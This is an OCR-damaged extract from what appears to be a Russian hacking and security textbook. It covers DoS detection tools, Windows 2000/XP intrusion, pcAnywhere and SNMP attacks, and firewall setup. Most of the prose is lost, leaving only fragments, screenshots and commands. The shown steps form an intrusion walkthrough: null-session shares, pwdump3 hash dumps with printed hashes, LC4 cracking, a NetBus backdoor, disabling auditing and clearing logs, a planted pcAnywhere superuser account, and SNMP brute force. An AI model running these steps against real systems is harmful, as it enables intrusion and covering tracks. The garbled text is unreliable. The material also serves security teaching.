- Nuke , - Nuke

. DoS
,
ICMP. .
- ICMP- Redirect (), , ,
.
17 .
- ICMP- Address
Mask Reply ( ),
, .

222

TCP- -
Nuke, , ICMP- Destination
Unreachable ( ), .
- ICMP- Source Quench ( ), . , ICMP- Destination Unreachable:
Datagram Too Big ( : ).
, ICMP DoS , , , , ,
,
.
, , DoS,
TCP/IP - NetBIOS Sir Dystic, nbname, NBNS IP-
NetBIOS Windows 2000 [4]. nbname, , NetBIOS NetBIOS. TCP/IP - , , , , net send.
, nbname
- , nbname, ,
nbname.

amak DoS
DoS - ,
. ,
, , . , [11] , , DoS, , , Web- . ,
Web-. ,
DoS.
DDoS - , , , , ,

13. DoS

223

-. , Foundstone.
,
, .. , 1 , Foundstone .
DDoS, , Foundstone .
Foundstone,
(Robin Keir), http://www.foundstone.com
DDoSPing 2.0, -. , UDP,
UDP .
. 13.11 DDosPing 2.0, .
DDoSPing 2.00

IP: 1.0.0.1

-Target IP address range Start IP address

|1.0.0.5[

End IP address

h .0.0.5

Stop

-Transmission speed control min


Speed (pkts/sec)
I

181

-o-

Modem > Coble > T1 > IAN


-Infected Hosts -

Program started: Sun Febl 6 13:50:48 2003


Waiting 6 seconds for final results...
Program stopped: Sun Febl 6 13:50:54 2003

Current IP
Packets sent
Time elapsed
Zombies detected

1.0.0.5
3
00.00:00
0
/iftp://www.fotindstoue

Save List
Configuration
com

. 13.11.
DDoS
DDoSPing 2.0 .
> Start IP address ( IP-) End IP-address (
IP-) IP- .

224

Speed () , , LAN.
, Configuration () (. 13.12).
, Windows defaults
(Windows ) Unix defaults (Unix ), Windows Unix, .
, DDoSPing 2.0 ,
WinTrinoo, ,
- StachelDraht Tribe Flood Network.
, (. 13.12).

DDoSPing 2.00
Windows defaults

El Enable

UNIX defaults

Send to UDP port

34555

"Ping" command

pngg..Ksl44

Expected reply

PONG

Listen on UDP port J35555

S Enable
SendlCMPID

668

"Ping" command

jgesundheit

Expected reply

sicken\n

Receive ICMP ID [69

Triho Network

0 Enable
SendlCMPID

789

Receive ICMP ID [

"Ping" command

p
ShowUDPtransmit srrnrs

Max run duration (sees

i
11 (0
/n - forever)
*

Transmit each packet

times

After scan ends, wait

secsforfinal replies

Cancel
OK

Puc. 13.12.
> DDoSPing 2.0 . . 13.11 Start ()
. Infected Hosts
( ).
, -
Zombie Zapper
(http://razor.bindview.com/tools/ZombieZapper_form.shtml),
WinTrinoo. . 13.13 , , , DDoSPing 2.O.

13. DoS

225

-Torgel(s)

0 Specify single IP or dass subnet

Target IR
InptnlPtite .

0 Trinoo

UDP source

[53

0 Trinoo for Windows

0TFN
0 StachelDraht
Shaft - my flooded host:
[10

| Repeats (1-300)
Zap

AboTjt|

Exit

Puc. 13.13. Zombie Zapper


DDoSPing 2.0, Zombie Zapper , DDoSPing 2.O.

, , , DoS - , , 1 . , , - ,
, - Web- - .
- , , ,
, ,
. DoS
, -
(-, , )
Web-.
IP- ICMP-!
IDS IP-, , , ,
Web. , - , .
DoS , -
- !
8 - 1687

5.

XakuHz TCP/IP
Windows 2000/XP
TCP/IP. 1 ,
. ,
,
, , , ,
.
, , -
.
, Windows 200/XP . TCP/IP ( 14),
( 15), ( 16),
( 17). 18
.

14.

Windows 2000/XP
, , - () ,
, - , ( , , [1]).
, , , -
-
. ,
.
?
TCP/IP,
. TCP/IP - .

.
1 ,

. - 12 Web-. , , ,
. 1, ,
- .

TCP/IP
IP- ,
ping
, W2RK (Windows 2000 Resource Pack).
IP-
ICMP (Internet Control Message Protocol - ). . . 14.1 ping Sword-2000.

228

Command Prompt
,
- C:\>ping 1.0.0.1
Pinging 1.0.0.1 with 32 bytes of data:
- Reply fron 1.0.0.1: bytes=32 time<lns ITL=128
Reply fron 1.0.0.1: bytes=32 tiroe<lns TTL=128
. Reply fron 1.0.0.1: bytes-32 time<lns TTL=128
Reply fron 1.0.0.1: bytes=32 time<lns TTL=12B

Ping statistics for 1.0.0.1:
, Packets: Sent - 4, Received = 4. Lost = 0 <0x loss>,
flpproxirnate round trip tines in nilli-seconds:
, Miciinun - Ons, Maxinun = Qns, fluerage = Oms
,

Puc. 14. L
ICMP Sword-2000 ping
. ICMP ,
, , hping (http://www.hping.org/).
(.. ) ICMP,
,
.

- ,
, [3].
SuperScan (http://www.foundstone.com),
(. . 14.2).
Lookup
Me 11 Interlaces |

Resolved |SWORD-20011
Timeout
Start QMF

stopfumT
0 Ignore IP zero
0 Ignore IP 255
Extract from file

Ping
1100 |

Scan lype
Resolve hostnames
0 Only scan responsive pings
0 Show host responses

Connect

Ping only

I2000

Every pod in list

All selected ports in fist


All list ports fiom
All potts fiom

. 14.2. SuperScan 3.0

14. Windows 2000/XP

229

. 14.2 IP-
1.0.0.1-1.0.0.7. ,
Sword-2000,
- TCP- 139 NetBIOS. ,
- .


,
, , . Windows NT/2000/XP -
NetBIOS 139.



Windows NT/2000, .
. Windows NT/2000/XP
.
net use\\1.0.0.1\IPC$ "" /user: ""
1.0.0.1 - IP- Sword-2000, IPC$ -
Inter-Process Communication --
( ), ""
, /user:"" .
, , .
, SMB (Server Message
Block - ). ,
.
,
;
.
Alex- ( Windows XP)
Sword-2000 ( Windows 2000).
Sword-2000 Alex- - , Windows XP
Windows 2000,
, , .

230


Windows NT/2000/XP. net view nbtstat W2RK. net view .
C:\>net view /domain

SWORD
.
SWORD. , .
C:\>net view /domain:SWORD

\\ALEX-3
\\SWORD-2000
.
Sword-2000 .
nbtstat; . 14.3.
1
Command Prompt
IC:4Docunents and SettingsSfilex>nbtstat - 1.0.0.1

Sword I
Node IpAddress: t l . 0 . 0 . 5 ] Scope Id: I]
NetBIOS Remote Machine Name Table
SUORD-2000
SUORD-200B
SIJORD
SIJOBD
SWORD
SUORD
SWORD-2000
SUORD
HSBROHSE
INet~Seruices
IS~SWORD-20UO..
ADMINISTRATOR

Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered

S2-54-BB-14-

Puc. 14.3. nbtstat


Alex-3
. 14.3 ,
NetBIOS, NetBIOS. ,
<00> , <00>
- . <03> , ,
<03> - , Administrator. MSBROWSE, <1>
SWORD.

14. Windows 2000/XP

231

, , - Administrator. Sword-2000 ? net view,


. . 14.4.
I Command Prompt
C:\Docunents and Settings\Alex>nbtstat -A 1.U.O.I
Sword:
Node IpAddress: [1.0.0.5] Scope Id: 13
NetBIOS Remote Machine Name Table

SUORD-2QQO
SUORD-20QQ
SUORD
SUORD
SUORD
SUORD
SUORD-2Gnt)
SUORD
nSBROUSE
INet~Seruices
IS~SUORD-2QQO..
ADMINISTRATOR

UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
GROUP
UNIQUE
UNIQUE
GROUP
GROUP
UNIQUE
UNIQUE

Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered
Registered

MAC Address - S2-54-AB-14-SS-B4

. 14.4. Sword-2000
, Administrator
Sword-2000 CD-ROM. , *
NetBIOS, Administrator,
7, 9, 13, 17, 139, 443, 1025, 1027 , :.
Administrator - : .
, pwdump3.exe Windows NT/2000/XP LC4
.
, NetBIOS /
( Windows 2000/XP )? , , SNMP (Simple
Network Management Protocol - ), Windows NT/2000/XP. 15 .
, , ,
.


Windows NT/2000/XP .
, .

232

,
, , .
- , ..


, . nbtstat MIB,
- , (. [3] [4]). ,
, . ,
.
D:V>net use \\1.0.0.1\1$ */u:Administrator
* ,
IPC$ Administrator.
:
Type password for\\1.0.0.1\IPC$:
. ,
- , , ,
. , , , SMBGrind, CyberCop Scanner Network Associates. (
[3]).
- .
, ,
, . Windows NT/2000/XP , SAM (Security Account Manager ). SAM (, , ) ,
, , . , - , , , , .
,
SAM, LC4 ( LOphtcrack,

14. Windows 2000/XP

233

- LC4) (http://www.atstake.com/research/redirect.html),
.
Samdump - SAM.
Pwdump - , . Syskey SAM ( Syskey . 4).
Pwdump2 - , Syskey.
.
PwdumpS - , Pwdump2, .
Syskey, 4; ,
SAM,
Windows 2000/XP , Windows NT
.
4 , , , .
Sword-2000 Pwdimp3, :
C:\>pwdump3 sword-2000 > password.psw
Sword-2000,
password.psw.

(Notepad) (. 14.5).
password.psw - Notepad
File

Edit

Formal

Help

(VdmimstratorSOO 7A01665EB2EBeC14AAD3e43SB51404EE:OB04l2D8761239A73143EFAE926E9FO

A:::

'

Guest:501 :NO PASSWORD


";NO PASSWORD"
"
:::
krbtgt:S02:NO PASSWORD
:7BD70B6AFK3909E00642aFE207B258:::
Alex:1110:7A0166SEB2EB6C14AAD3B435B51404EE:OBCM12De761239A73143EFAE926E9FOA:::
Ale*-1:1113:7A01665EB2EB:i4AAD3B43SB51404EE:OB0412D6761239A73143EFAE928E9FOA:::
TslnternetUb<!r:1ll4:BAD7DFC9A3l6ED47F7B4B3B55224FE93:C7BD9SEOEBBSEF513EEASA4:447
5CFO:::
I US R_S WORD-2000:111S: 3C2{ FS7EAAF6DF9E1A6F22062 A1 Si 3BE: 6FDDAS4130F3FOS7F762 F2414
B235646:::
I WAM_S WORD-2000:1116: ED30C29CC8 332 6F4A5C 20594)3490: 94688 F3440C09302 SC
B02SE6E2C:::
S WORD-2000S:! DOS: NO
PASSWORD
""""":3942CE20E6A112963BA6F7DC9BC34DD7:::
ALEX-3$:1109:NO PASSWORD""*"'"""
:B6B19C13A34F6BD4284C0199E51F12A8:::
ALEX.1$:1112:NO PASSWORD""""
'
:B7D45A21709B08W751E609477D72F:::

Puc. 14.5.
Sword-2000
, password.psw Administrator,
. , LC4, , -

234

,
Sword-2000 (. 14.6).
slake LC4 - [Untitledl]
File

View

Domain

Import

Session

Help

I User Name
I
Administrator
Guest
krbtgt
Alex
Alex-1
TslnternetUser
IUSR_SWORD-2...
IWAM_SWORD-2...
SWORD-200D$
ALEX-3J
ALEX-1S

LM Password

| <8 I NTLM Password

007

007

* missing *
* missing *
007
007

* missing *

007
007

Qd Oh Q 08

* missing *
* missing *
* missing *

Dictionary 1 of 1 [\\Alex- 3\@stake\LC4\words-english. die]

Puc. 14.6. ,
Sword-2000
Celeron 1000 , 007
. ,
LC4.
, , -
NetBIOS - , , .
, .

amaku
, - ,
, . -
, .
- ,
. , .
.

Invisible Key Logger Stealth (IKS) (http://www.amecisco.com/iksnt.htm),


6 . IKS -
,
.

14. Windows 2000/XP

235

- , ..,
, NetBus (http://www.netbus.org)
2 (Back Orifice 2000) (http://www.bo2k.com),
.
NetBus 2 - [3].
,
. ,
, , . - ,
, -
, ,
.
,
NetBus, cDc (Cult of the Dead
Cow - ).

NetBus
NetBus - , ..
, , , ,
, . ,
, . - ,
. , ,
- , . NetBus
: - Sword-2000
(IP- 1.0.0.1), - Alex-3 (IP- 1.0.0.5).
NetBus , NBSvr
( - fe NB Server fOffl |
). NBSvr , . 14.7.
NetBus NBSvr . .
> NB Server ( NB)
Settings (). 'Settings ' Close
Server Setup ( ), L
. 14.8.
. 14.7.
NetBus

236

Accept connections
( ).
Password ()
NetBus.
Visibility of
server ( )
Full visible ( ), NetBus
( ).
Access mode ( ) Full access ( ), Sword-2000

[server setup
Run on port:
20031

Password:
f~

|
(^

Visibility of server:
| Fully visible
Access mode:
Full access

i^3

||

0 Autostart every Windows session


Log CQnirnunication

| . OK

Cancel

Puc. 14.8.
NetBus

> Autostart every Windows session ( Windows),


.
> . .
- NetBus.exe.
> NetBus.exe, NetBus 2.0 Pro,
. 14.9.
V NetBus 2.0 Pro
File Host Control Help

Jlt-tf
Destination

I Host

Puc. 14.9. NetBus


Host * Neighborhood * Local (
* ). Network (),
. 14.10.

14. Windows 2000/XP

237

> Microsoft Windows (Microsoft Windows Network)


(. 14.11).
x|

iNelwoik

HALEX-
l^WORD

Add...

Network neighbourhood

Network neighbourhood
Microsoft Windows

2000 !

<l

Close

Add...

] Close

. 14.11.

Puc. 14.10.
NetBus

NetBus,
Sword-2000, Add (). Add Host ( ), . 14.12.

Destination: |SWORD-2000

Host name/IP: |1.0.0.1


TCP-port: |

|
20034)

Usei name: [Administrator


Password: |""

ft

OK

Cancel

Puc. 14.12. - NetBus


Host name/IP ( /IP) IP-
1.0.0.1.
User name ( ) Administrator, Password () -
LC4 007.
. Network ().
Network (), Close ().
NetBus 2.0 Pro
(. 14,13).

238

Host

Destination
SWORO:2gOO|
My computet

[Cannot connect to 127.0.0.1

Puc. 14.13. NetBus 2.0 Pro


NetBus
> Sword-2000,
Sword-2000 Connect ().
NetBus 2.0 Pro Connected to 1.0.0.1 (v.2.0)
( 1.0.0.1 (v.2.0)).
NetBus , NetBus,
. ,
Administrator. . 14.14 NetBus, Control ().

Message manager
DesNnatior ^3 File manager
indow manager
My J$K Registry manager
Sound system
Plugin manager
Port redirect
$* Application redirect
Remote control
IffJ File actions
W Spy functions
1 Cannot conne

Q Exit Windows

Puc. 14.14. Memo Control


14. Windows 2000/XP

239

, Spy functions
( ) , , , , . ,
, ,
, .
! Sword-2000,
Windows,
.
, NetBus,
IKS,
. IIS (. 13), *
. ( ).

Cokpbimue
, ,
, -
, .
, / .
, . ,
, auditpol.exe W2RK. ( ) ,
.
.
C:\Auditpobauditpol \\sword-2000 /disable
:
RunningAudit information changed successfully on \\sword-2000...
New audit policy on \\sword-2000...
(0) Audit Disabled
System
= No
Logon
= No
Object Access
= No
Privilege Use
= No
Process Tracking
= Success and Failure

240

.
Policy Change
Account Management
Directory Service Access
Account Logon

= No
= No
= No
= No

\\sword-2000 - , /disable
. auditpol.exe -
, ,
, , .
, auditpol /?,
. ,
/ SAM,
pwdump3.exe
SAM.

Windows 2000/XP,
( , ).
.
> (Start)
* (Settings * Control Panel).
>
(Administrative Tools).
> (Computer Management). .
> (System Tools * Event Viewer).
> (Security Log);
.
> (Clear all
Events). (Event Viewer)
.
> (No), . .
. , -
! , -
. ,
.

14. Windows 2000/XP

241

[3] elsave.exe (http://www.ibt.ku.dk/jesper/ELSave/default.htm).


Windows NT 4, Windows 2000.
.
C:\els004>elsave -s \\sword-2000 -
-s , -
. , . ( elsave /? ,
). , - elsave.exe
,
(Computer Management).
? ( ) W2RK, SAM,
. . .

.

- .
, , ,
. Windows
( , , , [7]). Windows, IDS.

, IDS, , IP-
(, BlacklCE Defender). , ,
, -
.

15.

XakuHg cpegcmB
. , , , ,
, .
- ,
. ,
.
, ,
. ,
: , . - ,
,
.
. ,
.
( ,
18). ,

-
, 18 PhoneSweep , .

pcAnywhere 10.5.
,
SNMP (Simple Network Management Protocol - ), Windows. SNMP Windows , , - SOLARWINDS
(http://www.solarwinds.net).

15.

243

pcAnywhere
pcAnywhere (http://www.symantec.com/pcanywhere)
Symantec TCP/IP. , pcAnywhere,
.

pcAnywhere
pcAnywhere ,
, , . , pcAnywhere,
, .
pcAnywhere , -
, .
pcAnywhere
pcAnywhere.
, - pcAnywhere
pcAnywhere,
(. 15.1).
' ALEX- - pcAnywhere

01

AddreK jlj My Computei


SI Desktop
+ Q My Documents
^f Local Disk [C:|
[} Contiol Panel
- " My Netwoik Places
0 Entiie Nelwoik
I ) Microsoft Windows Nelwoik
g D on Swoid-2000
it? My Documents on S old 2000
My Web Sites on MSN
io? Test on Swoid-2000
>g) NoitonPlotected Recycle Bin

Local Disk |C:]

|jfe5tail|

. 15.1. pcAnywhere Alex-3


pcAnywhere , , pcAnywhere Manager (
pcAnywhere), . 15.2.

244
File

Edit

View

Tools

Help

I X I? I H I ' I CD Lsers.WINNTVApplicetion Dato\Symontec\pcAnywhe[3

Add Host

DIRECT

MODEM

NETWORK.
CABLE. DSL

Puc. 15.2. pcAnywhere


pcAnywhere, .
> Hosts () (. . 15.2).
> Add Host ( ).
pcAnywhere Host Properties: New Host ( pcAnywhere:
), . 15.3.
pcAnywhere Hast Properties: New Hast
Connection Into [ Settings | Callers [ Security Options) Conference j Protect Item |
O;

Choose up to two devices for this connection item by checking the boxes to the left of the device
names.
To customize e device, dick the device name end then click Details.

Device list:
D Rockwell DPFPnP
1
2

4
DSPX
NetBIOS
TCP/IP
ISDN via CAPI 2.0

OK

J[

Help

Puc. 15.3.
Connection info ( ) Device list ( ) ,
. TCP/IP, TCP/IP.

15.

245

> TCP/IP
.
> Callers ().
, . 15.4.
pcAnywhere Host Properties; New Host
I Conneclicn Into [ Settings | Callers | Security Options [ Conference [ Protect Item |
Authentication type:

Caller list:
18 I X

| C: | ..sers.W!NNT\Application Dato\Symantec\pcAnywhel^J

OK

Cancel

Help

Puc. 15.4. pcAnywhere


Callers () ,
pcAnywhere, .
> Authentication type ( )
;
pcAnywhere.
> Caller list ( ) ,
. New item ( ), . pcAnywhere Caller Properties:
New Caller ( pcAnywhere: ),
. 15.5.

pcAnywhere, , , Login Name
( ), Password () Confirm Password ( ).
pcAnywhere Caller Properties: New Caller
( pcAnywhere: ) , ( Callback), ( Privileges)
( Protect item).

246
pcAnywhere Caller Properties: New Caller
Identification | Callback | Privileges | Protect Item |

Login Name:
Password:
Confirm Password:

Cancel

Apply

Help

Puc. 15.5. pcAnywhere


>

pcAnywhere Caller Properties: New Caller (


pcAnywhere: ) , . Caller list (
) (. 15.6).
pcAnywhere Host Properties: New Hast
Connection Into [ Settings | Callers [Security Options [ Confetence [ Protect Item |
Authentication type:
jpcAnywhere

|^|

Caller list:
| X. IS? | 3 " I CD | .,sers.WlNNT\Applicatiori Data\Symantec\pcAnywrie| * 1
Name
S Alex-3

I Callback

OK

Cancel

Help

Puc. 15.6. pcAnywhere !



.
> , ,
(. 15.6).

15.

247

> pcAnywhere Caller


Properties: New Caller ( pcAnywhere: ).
pcAnywhere (. 15.7).
File

Edit

View

Tools

Help

^Symantec.
I X fig | 8 I El - | Cl |...sers.WINNT\Applicetion Dala\SymanlBC\pcAnywhe|" |

Add Host

DIRECT

MODEM

NETWORK, Sword 2UIJU


CABLE. DSL

For Help, press F1

Puc. 15.7. Sword-2000e


pcAnywhere
> pcAnywhere,
Launch
Host ( ). . - .
pcAnywhere.
pcAnywhere, pcAnywhere, pcAnywhere .
> pcAnywhere Remotes ().
pcAnywhere Manager ( pcAnywhere), (. 15.8).
File

Edit

View

Tools

Help

Symantec.

~ ~~~

1ft | X ? I I " I I .sers.WINNT\Application Data\Syrnantec\pcAn>wKe[J

Add Remote

DIRECT

File
Transfer

MODEM

NETWORK.
CABLE. DSLj

Remote Control and F


For Help, press F1

Puc. 15.8. pcAnywhere


pcAnywhere

248

Add Remote ( ),
. .
> , NETWORK, CABLE, DSL (, , DSL). pcAnywhere Waiting ( pcAnywhere), . 15.9.
I * ncAnywhere Waiting..
TCP/IP Hosls

SWORD-2000

1.0.0.1

(]

Wailing for selection...

Puc. 15.9. pcAnywhere



i
pcAnywhere Waiting ( pcAnywhere)
pcAnywhere, pcAnywhere.
TCP/IP Hosts ( TCP/IP), Sword-2000
.
> SWORD-2000.
NETWORK, CABLE, DSL - pcAnywhere (, , DSL pcAnywhere), . 15.10.
^NETWORK. CABLE. DSL - pcAnywheie

pcAnywheie Host Login


Please enter yout login information:
User name:

Puc. 15.10. pcAnywhere


15.

249

pcAnywhere Host Login ( pcAnywhere)


, AIex-
Sword-2000, . , . 15.1.
pcAnywhere
Sword-2000 , Privileges ()
Alex- (. . 15.11).
Identification | Callback j Privileges Protect Item |

Superuser -caller has full access rights to host machine


0 Specify individual caller rights
0 Allow caller to blank screen

0 Allow caller to upload files

Allow caller to cancel host

0 Allow caller to download files

0 Allow caller to restart host

0 Allow use of Ctrl+Break

Time limits:
Limit time allowed per session:

^ minutes

0 Caller subject to inactivity timeout


Set Orive Access-

Command to execute after connect

Help

Puc. 15.11. pcAnywhere



Privileges () Superuser
(), Alex- Sword-2000. , - /,
pcAnywhere. , .

pcAnywhere
-, , 10.5.1 pcAnywhere
, (., , [3]).
Revelation ***********
pcAnywhere Host Login ( pcAnywhere). , pcAnywhere
, (. 15.11).
, , , pcAnywhere - ,
.

250

, , /, Administrator/password,
( [3], , ). Brutus,
Web- 10 12. , , , . - , -
, .
, ? . , pcAnywhere -
. ,
, pcAnywhere, , (. 15.9).
, . , Superuser () Privileges
() (. 15.11).
. , pcAnywhere
_:/01 and Settings/All Users.WINNT/Application
Data/Symantec/pcAnywhere ( ,
pcAnywhere),
. Sword-2000
pcAnywhere Alex-
PCA.Alex-3.CIF - .. ,
, .CIF.
, , ,
pcAnywhere. pcAnywhere ,
, Hacker, PCA.Hacker.CIF
. PCA.Hacker.CIF - Sword-2000 _:/01 and Settings/All
Users.WINNT/Application Data/Symantec/ pcAnywhere,
Sword-2000 (. . 15.12).
pcAnywhere , Hacker, - ,
-.

15.

251

pcAnywhere Host Properties: Sworii-2000


| Connection Inlo | Settings [ Callers [ Security Options [ Conference j Proled Hem {
Authentication type:
IpcAnywhere

It I X Si I " I CD |...sers.W1NNT\Application Data\Symantec\pcAnywhe|J


Name

| Callback

Alex-3
8 Hacker

AppK/

| |

Puc. 15.12. !
? ,
- NetBIOS,
9 - , , , TFTP.
- (
). pcAnywhere Web-, IIS, 12 IIS 5, ,
. , , ,

pcAnywhere - .
, pcAnywhere
?
, ,
14. Windows - , Windows NT/2000/XP, SNMP (Simple Network Management Protocol ).

252 _

SNMP
SNMP . SNMP
, - , SNMP . SNMP,
SOLARWINDS (http://www.solarwinds.net). ; , - . SOLARWINDS - , , .
SNMP
, NetBIOS TCP/IP
- Windows 2000/XP . Windows NT/2000/XP , SNMP, .

npomokoA SNMP
SNMP TCP/IP ( IPX). SNMP
- ,
- , , .
SNMP
SNMP ( SNMP) SNMP, .. SNMP, , MIB (Management Information Base - ). MD3
, ,
, , , . SNMP, , snmputil W2RK , IP
Network Browser, SOLARWINDS 2002 Engineer's Edition (
http://www.solarwind.net 30- ).
, SNMP,
SNMP, . SNMP -

15.

253

SNMP ,
, SNMP. UDP, IP, SNMP
Windows 161 162.

SOLARWINDS
SNMP, . SOLARWINDS,
.
. 15.13 MIB SolarWinds 2001
Engineer's Edition, MIB 1-3,
.

Inlv

SolarWinds MIB Browser - 0.0.5 results ...]


<p File
<3P
New

Edit

Tree

HostnameorIP

Window
1.0.0.5

[-r |

Community String |public

| I

Name
ccltt (P)
gQ3iso(1)

eG] org (3)


dod (6)
Lgj internet (1)
[-Q directory (1)
|-aQ mgmt (2)
j LffltL|miD-2(1)
1-| experi mental (3
}- private (4)

^"|

SMI'intqrnct

Get1 ...

u:i

Save

< |

|_"|s x

Help

i,

Print

-,

Get DID Gat T<ibla

Get Next

^?

Stop

Raw Value
DID Name
svUserName. 5 71.117.... Guest
svUserNome.7.78.101.... NewUser
svUserName.1 1 .73.85.... IUSR_ALEX-3
svUserName.1 1 .73.87.... IWAM_ALEX-3
svUserName. 1 3,65.1 0... Administrator
svUserName. 13.72.10... HelpAssistant
svUserName 1 6.83.85.... SUPPORT_388345aO
svShereNumber.O
5
svShareNome. 4.1 16.1 ... test
svSriareNarrie6.6-f.il... stake

Clear

14

Puc. 15.13. MIB Alex-3


. 15.13 , , , SAM LC4 (. 14).
, , SAM,
, .
, IP
Network Browser, (. . 15.14).

254

-jn|x

IP Network Browser I 1.0.0.1 ]


File

Edit

Nodes

MIBs

Discovery

Subnet

View

Help

| |> Windows NT Domain Controller


| C^ Conenunity String: public
Syatero MIB

Interfaces
- Shared printers
Services

Accounts
~.
Shares
Hub ports
TCP/IP Networks

IPX Hetwork

ARP Table
m - Routes
B- - UDP Services
TCP Connections
Subnet Seen Completed

Puc. 15.14. 1 IP Network Browser


MIB
,
. ,
SOLARWINDS 2001 Engineer's Edition SNMP
Brute Force Attack SNMP Dictionary Attack MIB , , ,
.
.
[3] SNMP ,
, public,
private, . - [3], ,
. SNMP
Brute Force Attack SNMP Dictionary Attack
SNMP . SNMP public private

. public"!, public2 , public. -
.
, SNMP Brute Force Attack, SNMP
.
> SNMP Brute Force Attack.
SNMP Brute Force Attack ( SNMP ) (. 15.15).

15.

255

SNMP Brute Force Attack


File

Edit

Export

Help

Print

s!

Settings

<$

Help

s*
<rJV
w'

lf

Target Hostname or IP Address jl


Attack Speed: Fast

Ml

11

1 >1

Attacl

E
A

. 15.15. SNMP
> Settings (). SNMP
Brute Force Attack References ( SNMP ),
. 15.16.
SNMP Brute Force Attack Preferences .
jenerajjl Character Set] Community Strings [ SNMP|

0 Stop searching after Reed/Only string is found

Try community strings up to 6 characters long

OK

Cancel

Help

Puc. 15.16.
>

Try community
string up to 6 character long (
6 ).

, ; , ,
. ( - ,
,
- . , , ?) , -
SNMP, - public, private - !

256

> , , Try community string up to 6


character long ( 6
) 7 , .
>

Community string ( ); . 15.17.


;

SNMP Brute Force Attack Preferences .

General |~Charader seifcommumtyjilrings SNMP|


Storting Community Siring [publica
Leave this blank to search all
possible community strings
0 Rotate from right to left
Example: AAAB. AAAC. AAAD. AAAE. MAP
Rotate from left to right
Example: AAAA DAAA EAAA FAAA

Help

Puc. 15.17. SNMP


Starting Community String ( ) publics - 7- .
.
SNMP Brute Force Attack ( SNMP )
Attack ().
- Current Community String
( )
. , . 15.18.
SNMP Brute Force Attack
SNMP Attack complete.
A Read/Only Community string of "public!" was
discovered.
OK

Puc. 15.18. SNMP - publid!


, ...
SNMP, 161 162, SNMP, TCP/IP, (Services)
Windows 2000/XP, SNMP.
SNMP
,
SNMP.

15.

257

, ( pcAnywhere), (
SNMP) ,

( ). , [3].
pcAnywhere , , -, ,
.
, SNMP,
SNMP . IP
Network Browser, , pcAnywhere,

pcAnywhere.
SNMP .
SNMP, Windows,
SNMP.
.
, , ,
- pcAnywhere
,
. ,
pcAnywhere ,
, .
Windows - .

9- 1687

16.

XakuH2
- ,
, , - . - , .
14 , - , , ,
, , , ,
. - ,
, . , ( ), -
, ...
, . , , ,
. , .
, , ,
? - . , ,
, . ,
... ,
, . -
. .

makoe
- ,
, , , .
,
.

16.

259

,
. ,
ACL (Access Control List -
). ACL
, , , , ,
.
, .

, . , .
IP-
, (
NAT - Network Address Translation). IP- , , , ,
.
, .
- .
, , , , ..
, . (., , [2, 12]),
80%
.

. ,
,
.



, .
9*

260

, ,
, .
.
,
.
.
. IP- . IP.
. ,
, , IP-
, , , ,
ACL.
( ), , , . -, ,
. ,
-,
, - , . -,
.
,
. , , ,
. ,
, , , Telnet, DNS, FTP, SNMP
. -
, , , , Telnet ( ), .
. - , .

16.

261

Hacmpouka nakemoB

, . , , ,
, .
, .
,
. ,
, TCP/IP UDP. , , ACL . .
ACL , , .
, , .
ACL , , , .
, :
,
(, );
;

,
, ,
25 SMTP (Simple Mail Transfer Protocol ).
, - ACL,
.
.
, ,
Mailer , Spammer.

262

(. 16.1),
.
16.1.

1.

(. 16.2).
16.2.

1.

Spammer

16.2 , , - . ,
- - Spammer, -
- . : , . , . (*) , ; , Spammer, Spammer
.
,
(. 16.3).
16.3. ,

1.

Spammer

2.

*'

Mailer

25

16.

263

2 , SMTP- 25 Mailer.
- ! 2
. 16.3 ( Spammer) - , , ,
.
, , , .
, .
. , WinRoute Pro
.
> WinRoute Pro,
WinRoute Pro WinRoute Administration (Start
Programs WinRoute Pro WinRoute Administration).
Kerio WinRoute Administrator (localhost), . 16.1.

. 16.1. WinRoute
> , Action * Connect ( *
). Open Configuration (
), . 16.2.

264
Open Configuiation

Configuration'
'
Enter a hostname or an IP address of a computer tunning
WinRoute:

WinRoute Host: [iocalhost

Username: [Admin
Password; |

OK

Cancel

. 16.2. WinRoute
, , ; .
WinRoute Settings *
Advanced * Packet Filter ( * ). Packet Filter ( ), . 16.3.
Incoming | Outgoing |

Reallek RTL8029IAS) PCI Ethernet Adapter 82 - Packet Sched


Any interface

Ed*...

Remove
OK

Cancel

Apply

Puc. 16.3.
Incoming () , Outgoing () - . .
> , Any Interface ( ), Add ().
Add Item ( ), . 16.4.

16.

265

-Packet DescriptionProtocol :~
-Source

Destination-

Type: |Any addtess

Action Permit
Drop
Deny

Type : | Any address

-Valid al-

Log Packet
Log into lite
Log into window

OK

Tirne interval: |[Always)

Cancel

Puc. 16.4.
> , Protocol ()
, .
Add Item ( ) , .
> - Packet
Filter ( ) (. 16.3) .

nakemoB

, ,
.
IP- (-),
.
IP-
IP-, . ,
IP- IP- . , IP-
.
, , . -,
, , .

266

, ,
.
,
,
. , , .
,
.
, ; - SYN. -
- , SYN,
- ,

.
,
, . ,
, , .
, , , .
, .

nocpegtmku
,
, .
,
-.
,
. .

-,
, ,
. , , . , - FTP

16.

267

FTP , -
FTP-.
-
, , -
.

, . ,
, .
Deerfield Wingate Pro
(http://www.wingate.com). - . , , , .

kanaAbHbie

.
-
, .
,
, .
. , , , .
. ,
,

.
,
. ,
.

Hacmpouka
, ,
- ? -

268

, ,
( ) .
. , .
, .
WinRoute Pro (http://www.kerio.com)
Kerio Technologies Inc. WinRoute
- , -,
( ), .
,
, . 1-1
WinRoute Pro 1-1 ,
Sword-2000. Alex- Sword-2000 1-1 .
TCP/IP Alex- IP-
2.0.0.3 255.0.0.0. 1-1 IP- 2.0.0.1 255.0.0.0.
, Windows 2000 IP-
1.0.0.1 1.0.0.7, Alex-
IP- 2.0.0.3. Alex-,
Sword-2000, - NetBUS (. 14). , NetBus - WinRoute,
.
, - ,
- . ,
. , ; - ,
. , .

XakuH2 WinRoute Pro


, ,
.
, , , .. ,

16.

269

, ,
, . .

116
, , 1-1 (IP- 1.0.0.7)
.
.
SuperScan, . 16.5
IP- 1.0.0.1 - 1.0.0.7, 1-1.

[1.0.0.1

Lookup

Resolved |SWORD-2000
imeout

-IPSlartjl 00.1
Slop|1.0.0.7

Me

IB

Ping
Connect
|20QO

IgnofelPzeto
0 Ignore IP 255
Extract from lite

Read
14000

-Scan type0 Resolve hostnames


0 Only scan responsive pings
[3 Show host responses

Interfaces

11.0.0.7

Ping only
Every port in list

11.0.0.7

All selected ports in list

11.00.7

All list ports from


All ports from

Slarl

Slap

eS 1.0.0.1 SWORD-2000
!
